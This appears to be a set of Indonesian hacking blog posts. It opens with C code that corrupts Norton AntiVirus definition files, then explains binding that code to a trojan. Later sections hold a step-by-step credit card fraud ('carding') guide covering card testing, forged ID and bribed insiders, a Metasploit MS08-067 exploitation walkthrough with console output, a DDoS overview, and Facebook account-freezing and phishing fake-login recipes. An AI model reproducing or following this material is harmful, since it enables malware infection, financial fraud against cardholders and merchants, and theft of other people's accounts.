temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}
* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.
//--- code ----//
Penyerangan
Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki 2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.
Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe.
Hal ini dilakukan agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target yang dituju.
10 tools for hacker
Dari 100 tool tersebut, berikut dibawah ini adalah 10 tools favorit yang mendapat suara terbanyak sepanjang tahun 2006. Tool tersebut merupakan senjata yang dianggap mutlak diperlukan dalam aktivitas hacking dan sekuriti.
1.Nessus

“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.
Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.
2.Snort

Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di www.snort.org.
3.Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).
Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.
4.Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com.
5.Netcat
Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.
Fitur yang terdapat pada Netcat antara lain :
-
Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..
-
Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
-
Port scanner, untuk mendeteksi port yang terbuka.
-
Buffered send-mode dan hexdump RFC854 telnet.
6.Hping

Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.
7.TCPDump
Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www-iepm.slac.stanford.edu/monitoring/passive/tcpdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.
8. John The Ripper
Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.
“John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.
9. Cain And Abel
Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkan password dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. www.oxid.it
10. WireShark / Ethereal
Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark
dapat berjalan pada Windows, MAC OS X, dan Linux. www.wireshark.org
Tertarik? Pelajari dan pahami saja cara penggunaan 10 tool tsb. Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.
carding ..basi..!!!
bukan maksud utk menggurui rekan carder Indonesia lainnya, maka dgn segala kerendahan hati kami mencoba utk membagi Tips dan Tricks ini utk rekan - rekan yg ingin mencoba terjun dalam kegiatan carding....
...:::Bagi rekan carder yg memiliki nomor extrapolate, dpt mencoba membuat e-mail bayar pada Network Solutions (www.networksolutions.com) dgn tdk menambah account (JANGAN klik menu pull down : add 1 account e-mail. Sebab kita memanfaatkan NetSol hanya utk mengetahui nomor extrapolate tsb masih berlaku atau tidak), ikuti prosedur selanjutnya, sampai pada sesion pemasukan nomor tadi. Ulangi pengisian nomor apabila ditolak, gunakan nomor lainnya. Jika anda merasa sulit untuk validasi di NetSol (saat ini semakin sulit), kami mencoba memberikan alternatif URL yang dapat anda jadikan referensi dalam hal daftar perusahaan-perusahaan register domain (hanya utk test nomor kartu kredit), yaitu pada www.internic.org/regist.html Atau dpt juga membeli software - software murah di situs - situs penjual software:::...
...:::Anda dpt mengunjungi toko - toko yg ada pada website ini, yg sebagian besar telah kami coba. Dan jgn khawatir, keterangan disamping tokonya adalah pengalaman kami sebenarnya. Masalah sedikit banyaknya yg sudah mengorder di toko tersebut, kami tdk jamin 100%, namun perlu diketahui bhw situs ini tadinya situs pribadi. Jadi sebelum publikasi, hanya "bA" yg mengorder, dan barang yg diorder kuantitasnya minimal sekali, namun rutin (lihat pada halaman 1 daftar online shop, toko timeclub.com yg berkali-kali mengirim barang dlm kurun waktu 1 tahun terakhir ini/th2008):::...
...:::Anda dpt mengorder barang senilai LEBIH DARI US$ 1000 dgn menggunakan trick : *Gunakan identitas palsu pada saat mengambil barang di kantor pos atau jasa pengiriman lainnya (....dgn memalsukan KTM/Kartu Tanda Mahasiswa biasanya lebih mudah, dan foto yg tampak di KTM palsu tadi harus sesuai dgn wajah si "X" yg mengambil barang tsb, di kantor pos atau jasa pengiriman lain). Sedangkan namanya, tetap nama si "X", hanya alamat di kartu identitas yang kita palsukan. Jika ditanya kenapa alamatnya berbeda, alasannya : "....itu alamat lama, dan saya sudah pindah rumah/kost". Apabila nama si "X" (pengambil barang) berbeda dengan nama yang dikirimi barang (hasil dari order), biasanya pihak kantor pos atau jasa pengiriman lainnya akan meminta surat kuasa:::...
...:::Anda dpt mengorder barang senilai US$ 500 dgn menggunakan trick : (bisa juga menggunakan trick diatas) *Bisa menggunakan nama dan alamat asli, karena order barang senilai US$ 500 masih tergolong rendah, atau gunakan alamat Warung Internet (Warnet) tempat anda biasa mengakses (tentunya bekerja sama dengan si penjaga Warnet tsb.):::...
...:::Anda dpt mengorder barang kurang dari US$ 200 dgn aman apabila nomor tersebut bukan milik orang di Indonesia:::...
...:::Apabila anda menggunakan nomor extrapolate yg sudah digunakan pada saat proses validasi di Network Solutions, berarti nomor tersebut telah dicharge sebesar yg anda masukkan tadi, makanya buat serendah - rendahnya dlm membuat domain tadi, misalnya .org (..sekitar US$ 60). So, kalo udah gitu, utk mengetahui besarnya biaya charge dari nomor tsb tinggal jumlahkan aja harga barang yg diorder dengan biaya yg udah dicharge di NetSol tadi. Bila harga barang yg diorder senilai US$ 45, berarti nomor extrapolate yg kita gunakan tsb sudah dicharge sebesar US$ 105:::...
...:::Pada saat proses order (shopping), pengisian data Nama, Alamat dan lainnya milik kita (pembeli/shopper), harus sama dengan alamat yg akan dikirimi barang. Misalnya, si "X" mengorder barang, maka pengisian Billing Address (alamat faktur si pemesan) dan Shipping Address (alamat tujuan pengiriman barang) HARUS SAMA. Jika dlm billing address yg memesan barang atas nama "X", maka pengisian nama pada shipping address harus nama si "X" tadi:::...
...:::Jika anda tinggal di Propinsi Surabaya, sebaiknya alamat pengiriman barang jgn dikirim ke Kota BONEK tsb. Karena apabila anda tidak ada kongkalikong dengan pihak kantor pos atau jasa pengiriman lainnya, jgn pernah mengharap barang akan datang. Apa lagi untuk barang - barang yg tergolong 'wah', namun jika majalah dan CD serta sejenisnya, kemungkinan besar masih bisa. Sebagai masukan, Surabaya menduduki peringkat ke-2 setelah Yogyakarta dlm event kegiatan carding di Asia, sementara Indonesia sendiri menduduki peringkat III dunia masih dlm event kegiatan carding. Bahkan dalam waktu dekat, Indonesia mungkin bisa meraih peringkat I di dunia:::...
...:::Besarnya biaya penebusan dpt bervariasi, tergantung dari (pajak) barang yg kita order (biasanya mulai dari Rp 3000,- sampai lebih dari Rp 100.000,-). Atau ada juga barang yg dikirim langsung ke alamat tujuan. Jangan takut dulu bila anda disuruh menebus dgn biaya tinggi, karena kemungkinan besar barang yg dikirim itu nilainya lebih dari biaya penebusan:::...
...::
alam pengisian alamat e-mail (milik kita) utk jalur konfirmasi dari pihak online shop, sebaiknya gunakan alamat 'e-mail bayar'. Karena, selain tidak ada banner (menghemat waktu loading), ada sedikit nilai tambah di mata pihak online shop yg kita order barangnya:::...
...:::Tidak semua online shop yg ada lambang VeriSign di websitenya aman dan ketat dalam proses validasi kepemilikan kartu kredit, jadi jangan patah semangat dulu. Kecuali, pihak online shop melibatkan pihak Pay Pal (pihak ketiga sbg perantara yg menangani sistem pembayaran), itu pun masih bisa kita akali. Caranya, manfaatkan account milik orang bule juga di Pay Pal, lalu gunakan saja dgn percaya diri penuh, seolah - olah kita yg punya account tsb:::...
...:::Jika anda shopping di online shop selain yg berbahasa Inggris, sebaiknya diperhatikan metode pembayarannya/payment sistem/payment methode (kecuali anda menguasai bahasa di negara online shop tsb). Karena jika anda tidak teliti, bisa - bisa anda memilih metode pembayaran ...:::Bila anda mendapat e-mail konfirmasi dari pihak online shop berupa ancaman (..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu. Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar, pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh solusinya, masih bejibun online shop yang lain:::... ...:::Jika anda dikirimi email konfirmasi dari pihak online shop berupa e-mail kosong, namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah (bukan di tempat umum), karena kemungkinan besar file tersebut mengandung trojan. Bila yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya trojan, anda bisa menginstall ulang sistem operasi pd komputer anda (dgn asumsi, anda harus menghapus bersih folder sistem operasi anda tersebut sebelum reinstall), dengan sistem operasi yg masih fresh:::... ...:::Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan e-mail konfirmasi ketika barang akan dikirim. Atau bahkan tidak mengirimkan e-mail konfirmasi kepada kita, saat setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c (jadi ada nilai kemungkinannya):::... ...:::Jika anda disebut sebagai thief, frauder, etc., pada e-mail konfirmasi dari online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya:::... ...:::Setiap order yg berhasil (barangnya datang), biasanya anda mendapat surat panggilan dari Kantor Pos atau Jasa Pengiriman (<== via telepon) lainnya utk menebus barang tersebut (..utk barang yg kecil biasanya langsung dikirim ke alamat tujuan). Tebuslah barang tsb !! (Apalagi jika anda mengorder barang dalam jumlah besar), guna menjaga kemungkinan barang tsb dialihkan ke Kantor Polisi atau pihak berwenang lainnya:::... ...:::Hindari pemesanan/order yang besar - besar terutama untuk merk - merk terkenal dan mahal, serta perlu diperhatikan JUMLAH barang yg diorder dalam satu kali transaksi, karena jika terlalu banyak dapat menimbulkan kecurigaan pihak online shop/store:::... ...:::Jadilah orang yg sabar, hindari pemesanan yang menggunakan pengiriman express. Sebab, untuk menjaga kewajaran dalam pengeluaran dana dari nomor kartu kredit yg digunakan tersebut. Sehingga pihak online shop/store, berprasangka bahwa kita orang yg cukup memperhitungkan pengeluaran dana:::... ...:::Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki. Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik dalam pembentukan mental carder):::... ...:::Pelajari teknik hacking/cracking step by step:::... ...:::Jangan lupa berdoa kepada Tuhan YME, sesuai dgn agama dan kepercayaan anda. Semoga kita semua dalam lindungan-Nya. Amin:::... ....:Alternatif Lainnya:.... - GANTI PROXY ANDA ( PROXY DIDAPAT DAN DI CHECK DI www.stayinvisible.com) TIPS DAN TEKNIK :
GANTI PROXY SESUAI DENGAN NEGARA KARTU KREDIT ANDA
- KETIKA KARTU KREDIT SUDAH SIAP DAN PROXY SUDAH SIAP MAKA CHECK
KARTU KREDIT DI www.wallet.yahoo.com
YAHOO WALLET
- setelah dapat kartu kredit yang ok, beli email bayar di yahoomail plus
- dengan email bayar tersebut daftarkan di account www.ebay.com EBAY
- lalu mengecek keberadaan uangnya di www.ibs-authorization.com NGECEK ISI CC DAN
INFORMASI CC
- setelah ada uangnya. buatlah account www.paypal.com PAYPAL dengan cara subscription
- setelah urusan pembayaran telah siap, maka lakukan penawaran barang di www.ebay.com
- setelah ada barang yang dibayar, maka bayarlah dengan account di www.paypal.com PAYPAL
ACCOUNT
- SITUS www.wallet.yahoo.com ( type security rendah = asal CCnya bukan USA )
- situs www.ebay.com ( type security rendah, lakukan transaksi yang bisa dikirim ketempat anda)
- www.ibs-authorization.com CHECK VALIDITAS DAN ISI CC (type security tinggi, harus ganti
proxy dan sangat ketat )
jika memakai kartu kredit generate kemungkinan nya isi kartu kreditnya bisa dilihat 60% saja.
- www.paypal.com (type security tinggi, jika memakai kartu kredit generate hanya 50% accountnya
bisa dipakai)
- INGAT WALAUPUN SUDAH LOLOS YAHOO WALLET BELUM TENTU BERHASIL
DIBELANJAKAN KARENA MUNGKIN SAJA UANGNYA SUDAH HABIS
JADI ngecek di www.ibs-authorization.com sifatnya wajib dan bikin account dipaypal sifatnya tidak
wajib karena ada metode
lainnya yaitu account di bidpay
Page 1 of TUTORIAL CARDING 2
http://users.cjb.net/teknik-carding/ 6/14/2005
tips selanjutnya :
- lebih baik memakai kartu kredit asli, atau jika memakai kartu kredit generate
setelah lolos www.wallet.yahoo.com check apakah ada uangnya tidak di www.ibs-authorization.com
jika sudah ada. maka pada penjual barang untuk dibayar lewat www.bidpay.com
- tingkat security www.bidpay.com lebih rendah dibandingkan www.paypal.com
tips selanjutnya :
- setelah barang selesai dibeli dan dibayar mintalah pada penjual untuk mengirimkan barangnya
sebagai kado atau hadiah untuk
saudara. maka buatlah ktp asli tapi palsu.dan mintalah pada penjual barangnya agar barang dikirim
dengan settingan hargapenjualan cuman dibawah 100$ (untuk menghindari pajak yang besar)
- gunakan kotak pos atau teromolpos (langganan sebaiknya )
- cari orang dalam untuk mengambil barang kita ( upah orang dalam Rp 200.000/paket = paket
dibawah 5 juta =)
tutorial metasploit
Seperti yang telah kita ketahui, metasploit framework adalah sebuah penetration tool yang cukup powerfull dalam melakukan sebuah penestrasi ke sebuah system. Dan ini bisa menjadi sebuah pedang yang mempunyai 2 sisi, digunakan sebagai analyst system tool atau digunakan untuk melakukan kegiatan negatif yang berakhir pada attacking. Melalui artikel ini, saya memberikan salah satu contoh penggunaan MF dalam melakukan sesi gaining access.
Kali ini kita akan menggunakan modul exploit yang akan mem-parsing kelemahan kode pemrograman pada NetAPI32.dll, yang terdapat dalam layanan services bawaan windows. Ini berkaitan juga dengan services NetBIOS (Lagi-lagi netbiosnya windows, setelah bug RPC yang kian menjamur beberapa waktu yang lalu). So, let’s use linux friends.. ;p
Modul ini mempunyai kemampuan mem-bypass DEP( Data Execution Prevention )dalam system operasi Wind*ws. DEP adalah salah satu services di wind*ws yang mempunyai fungsi untuk membantu mencegah/membatasi dampak yang terjadi pada saat ada virus atau sebuah ancaman keamanan [threat security] sedang aktif.
Untuk DEP ini, anda bisa melihat aktif apa tidaknya, pada bagian “Properties” di My Computer, lalu pilih pada bagian “Advanced” dan lihat pada bar “Data Execution Prevention”.
Modul ini bekerja, jika target adalah Wind*ws XP Operatin System (s/d WinXP SP 3), namun juga bisa pada target ber-OS Wind*s 2003, asalkan DEP-nya non aktif.
Ok, langsung kelangkah-nya..
Pertama anda siapkan metasploit dengan update terbaru
(cara ini berlaku untuk minimal versi framework 3.2-testing.5773)
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
lalu anda pilih modul exlpoitnya, seperti berikut :
msf > use windows/smb/ms08_067_netapi
untuk petunjuk opsi/pilhan yang bisa anda gunakan anda bisa lakukan :
msf exploit(ms08_067_netapi) > show options
lalu anda set target
msf exploit(ms08_067_netapi) > set RHOST 192.168.54.xx
RHOST => 192.168.54.xx
kemudian anda set PAYLOAD
msf exploit(ms08_067_netapi) > set PAYLOAD Generic/Shell_Bind_TCP
Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi. Untuk kali ini, mudahnya kita pilih Generic/Shell_Bind_TCP, maksudnya kita akan mengambil alih Shell Bind (kalau di lingkungan windows dikenal sebagai Command Prompt) dari target hacking kita.
Untuk setting yang lain, karena kita masih belajar maka biarkan saja default adanya.
kemudian tinggal jalankan EXPLOIT-nya :
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target…
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73227 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.54.1:51707 -> 192.168.54.xx:4444)
Dan jika berhasil maka anada akan disuguhi sebuah window baru berisi sebuah layar Command Prompt dari komputer target dan anda mempunyai level administrator.
Oh ya, cara diatas memang sengaja saya gunakan MF yang versi console, sebenarnya ada versi GUI-nya dan juga yang WEB based.
Saya menggunakan console karena saya tertarik dengan quote dari distro linux xcode : hacker tidak membutuhkan tampilan yang memukau ;p
Namun, keputusan akhir terserah pada anda.
ddos attack !!!
Pesatnya penyebaran internet sekarang ini, membuat banyak pelaku bisnis menggunakan jasa internet sebagai media untuk menjalankan bisnisnya. Ada juga pelaku bisnis yang hanya menggunakan jasa internet saja sebagai tempat transaksi dalam menjalankan bisnisnya. Pelaku bisnis seperti ini mungkin saja mereka tidak memiliki kantor yang tetap sebagai pusat bisnis, dimana mereka hanya mengandalkan internet sebagai pusat bisnisnya. Bagi pengusaha yang sebagian besar memanfaatkan internet sebagai pusat bisnisnya harus berhati-hati atas adanya bahaya para cracker. Salah satu serangan yang sederhana tetapi sangat berbahaya adalah serangan DDOS. Serangan DDOS ini sangat memberikan efek negative kepada para pengusaha yang menggunakan jasa layanan internet.
Kata kunci: serangan, DDOS.
PENDAHULUAN
Internet merupakan sebuah media informasi maupun komunikasi. Banyak informasi yang bisa didapatkan diinternet. Mulai dari informasi mengenai pendidikan, iklan maupun yang lainnya. Selain itu, internet juga banyak dimanfaatkan oleh para pengusaha untuk dijadikan sebagai peluang bisnis. Meskipun tidak memiliki kantor yang tetap, bisnis masih bisa dilakukan meskipun hanya menggunakan sebuah web sederhana.
Para pelaku bisnis yang hanya mengandalkan fasilitas internet harus berhati-hati atas ancaman-ancaman yang ada diinternet. Misalnya serangan DDOS yang merugikan. Serangan ini bisa membuat server web yang digunakan sulit untuk diakses, bahkan sampai tidak bisa diakses. Hal ini bisa menimbulkan kerugian di pihak pengusaha yang hanya menggunakan layanan internet untuk menjalankan bisnisnya.
PENGERTIAN DENIAL DISTRIBUTE OF SERVICE (DDOS)
Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut [01]. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya [03]. Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses [02]. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang [04].
Dari beberapa pengertian di atas dapat disimpulkan bahwa serangan DDOS (Denial Distribute Of Service) sangat merugikan bagi yang diserang, karena serangan ini dapat menghambat kerja pengguna dari komputer korban. Dimana komputer korban menjadi lambat dan sulit untuk diakses akibat dari penuhnya trafik dalam komputer tersebut.
CARA KERJA SERANGAN DDOS
Cara kerja DDOS dalam melakukan serangan kepada situs yang diinginkan. Secara sederhana serangan DDOS bisa dilakukan dengan menggunakan perintah “ping” yang dimiliki oleh windows. Proses “ping” ini ditujukan kepada situs yang akan menjadi korban. Jika perintah ini hanya dilakukan oleh sebuah komputer, perintah ini mungkin tidak menimbulkan efek bagi komputer korban. Akan tetapi, jika perintah ini dilakukan oleh banyak komputer kepada satu situs maka perintah ini bisa memperlambat kerja komputer korban.
Satu komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi. Dan server dari situs yang dituju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang. Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan “Ping” ke situs yang di tuju [05].
BEBERAPA SOFTWARE YANG DIGUNAKAN UNTUK MELANCARKAN SERANGAN DDOS
Disini akan di bahas empat macam software yang bisa digunakan untuk melancarkan serangan DDOS [06].
1. The Tribal Flood Network (TFN).
TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground
yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood
connection dengan menggunakan protocol yang ada pada TCP/IP yaitu:
o UDP, difokuskan pada domain name system dan network management program.
o TCP, pusat e-mail dan web transaksi.
o ICMP, digunakan oleh para professional untuk troubleshooting network.
o Nama program masternya adalah : tribe.c dan program daemon bernama td.c
2. Trin00
Software ini menggunakan UDP untuk mengirimkan flood packets network. Port yang digunakan adalah:
o Attack to Master : TCP Port 27665
o Master to Daemon : UDP Port 27444
o Daemon to Master(s) : UDP Port 31335
Program master : master.c dan program Daemon : ns.c
Program ini tidak bagus untuk digunakan karena master dan daemon
berhubungan dengan clear text.
3. Stacheldraht
Nama program ini dalam bahasa Jerman yang berarti “Barb Wire”. Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup berbahaya.
o Port TCP : 16660 dan 60001
o Master program bernama : mserv.c dan daemon program bernama : td.c
o Program ini memiliki client yang juga sebagai telnet : client.c
Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.
4. TFN2K
Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.
CARA MENGINSTALASI PROGRAM DDOS
Untuk menginstalasi program DDOS, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security dengan cara yang sangat mudah, gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Software client tersebut dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan[06].
EFEK DARI SERANGAN DDOS
Efek dari serangan DDOS sangat menganggu pengguna internet yang ingin mengunjungi situs yang telah diserang menggunakan DDOS. Situs yang terserang DDOS sulik untuk diakses bahkan mungkin tidak bisa untuk diakses. Kesulitan pengaksesan sebuah situs diinternet bisa saja merugikan bagi sebagian orang yang bisnisnya sangat tergantung kepada layanan internet.
Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti ini hanya merupakan gangguan yang memerlukan restart system.
Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker
untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini
merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai
tujuannya yang telah ditargetkan[06].
membekukan facebook orang lain
Mau iseng? begini nich cara nge “hack” atau membekukan account Facebook Membekukan/freeze. Caranya mudah banget, silakan download softwarenya disini atau disini. Setelah didwonload, exstract filenya dan jalankan.
Cara pakai:
- ketikkan email target pada Form eMail
- Klik Frezee
- Tunggu sampai proses selesai / 100%
- Efeknya account yang di Frezee tidak akan bisa login, jika anda suah merasa “puas” dan ingin membebaskan target silakan klik “stop freezer”.

Melihat Photo Pada Private Profile/Bukan Teman
- Login
- Klik disini!
- Klik “Allow” untuk setuju dengan ketentuan dan kebijakanAkan keluar tampilan seperti dibawah: Paste kan target ID dan klik “Get Photos”

Selamat mencoba, mudah-mudahan masih bisa/belum di patch
facebook fake login
Hacking facebook dengan fake login :
1. Buatlah akun dengan mendaftar di webhosting gratisan yang mendukung/support PHP. Seperti :
- Byethost
- Ripway
- Fileave, dll
2. Download Script Fake Login disini atau disini. (file.rar)
3. Extrak file tersebut dan simpan/upload di satu direktori di webhosting yang telah anda daftar, contoh http://NamaAnda.fileave.com/facebook/. 3 file tersebut yaitu :
- Index.html
- logs.php
- logs.txt
4. Buatlah email palsu dengan memberikan embel-embel admin facebook tujuannya agar si korban percaya. contoh :
admin_facebook@yahoo.com / admin.facebook.gmail.com / admin.fb@plasa.com
5. Terus download isi pesan untuk email palsu disini atau disini. (file.doc)
6. Buka isi file tersebut. Lalu ganti nama Cinta yang berwarna merah dengan nama anda dan ganti alamat_email_anda@gmail.com yang berwarna merah dengan alamat email palsu anda. Terus pada URL :
http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2
Yang berwarna biru ganti dengan URL halaman fake login yang telah anda buat. contoh :
http://iamkrisna.fileave.com/index.html
7. Setelah semuanya anda edit, segera kirim isi pesan tersebut ke alamat email si korban .. Alamat email + password si korban akan datang sendirinya ke email palsu anda kalau si korban ketipu ... hehehe
Puas ? Kalau belum, facebook'er bisa klik disini untuk hacking facebook dengan keylogger !!! Mau ?
Untuk menghindarinya, anda bisa klik disini.

